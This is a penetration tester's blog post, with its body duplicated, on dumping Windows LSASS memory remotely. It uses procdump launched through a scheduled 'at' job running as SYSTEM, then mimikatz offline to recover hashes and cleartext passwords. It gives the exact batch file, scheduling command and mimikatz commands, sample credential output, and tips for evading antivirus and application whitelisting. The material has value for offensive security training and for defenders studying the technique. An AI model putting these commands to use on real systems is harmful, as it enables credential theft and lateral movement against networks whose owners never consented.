I tweeted about this blog post a few weeks ago and got to use it on a PT, so its no secret...
also mubix beat me to this post, but i'm posting it here for my notes keeping purposes
First, check out this post by the mimikatz author. Now, one of the twitter comments I received was: "duh anyone can right click and dump process memory to a file". Unfortunately i'm rarely sitting with a GUI and can just "right click" but i do usually have the ability to "net use" and create scheduled tasks. The cool thing about AT jobs and scheduled tasks is that if you run them as "admin" they really get run as SYSTEM, so you can do neat stuff like dump lsass memory or get SYSTEM shells when the job executes your binary.
So quickly how I've been doing it.
Once you have creds, you net use the remote box and copy over procdump.exe and procdump.bat
contents of procdump.bat
@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\somethingwindows.dmp 2>&1
then just create an "at" job to run it for you
at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat
From there you'll have a dump file, copy it back from the remote host and use mimikatz alpha to retrieve the creds from the dump file: from the mimikatz blog post:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords
Authentication Id: 0; 141237
User Name: sekur_000
Domain: WINDOWS-8
msv:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* LM: d0e9aee149655a6075e4540af1f22d3b
* NTLM: cc36cf7a8514893efccd332446158b1a
tspkg:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
WDigest:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
livessp:
* Username: sekurlsa@live.fr
* Domain: ps: password
* Password: waza1234 /
kerberos:
ssp:
Why not just push up mimikatz? Well, mimikatz you download is now tagged by AV, so you can compile you own and get around that, white listing tools should prevent mimikatz from running but will probably allow sysinternals tools or powershell, but mostly this method make it so you don't need a meterpreter sessions or other type of interactive shell on the remote host. run bat file, get your dump file, and get creds offline.
------
if for some reason you want to run mimikatz via a bat file you can use the following commands
type schtask.bat
C:\temp\mimikatz64.exe "sekurlsa::logonPasswords full" exit >> C:\temp\mimi.txt
then you can run it with an at job.
-CG
also mubix beat me to this post, but i'm posting it here for my notes keeping purposes
First, check out this post by the mimikatz author. Now, one of the twitter comments I received was: "duh anyone can right click and dump process memory to a file". Unfortunately i'm rarely sitting with a GUI and can just "right click" but i do usually have the ability to "net use" and create scheduled tasks. The cool thing about AT jobs and scheduled tasks is that if you run them as "admin" they really get run as SYSTEM, so you can do neat stuff like dump lsass memory or get SYSTEM shells when the job executes your binary.
So quickly how I've been doing it.
Once you have creds, you net use the remote box and copy over procdump.exe and procdump.bat
contents of procdump.bat
@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\somethingwindows.dmp 2>&1
then just create an "at" job to run it for you
at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat
From there you'll have a dump file, copy it back from the remote host and use mimikatz alpha to retrieve the creds from the dump file: from the mimikatz blog post:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords
Authentication Id: 0; 141237
User Name: sekur_000
Domain: WINDOWS-8
msv:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* LM: d0e9aee149655a6075e4540af1f22d3b
* NTLM: cc36cf7a8514893efccd332446158b1a
tspkg:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
WDigest:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
livessp:
* Username: sekurlsa@live.fr
* Domain: ps: password
* Password: waza1234 /
kerberos:
ssp:
Why not just push up mimikatz? Well, mimikatz you download is now tagged by AV, so you can compile you own and get around that, white listing tools should prevent mimikatz from running but will probably allow sysinternals tools or powershell, but mostly this method make it so you don't need a meterpreter sessions or other type of interactive shell on the remote host. run bat file, get your dump file, and get creds offline.
------
if for some reason you want to run mimikatz via a bat file you can use the following commands
type schtask.bat
C:\temp\mimikatz64.exe "sekurlsa::logonPasswords full" exit >> C:\temp\mimi.txt
then you can run it with an at job.
-CG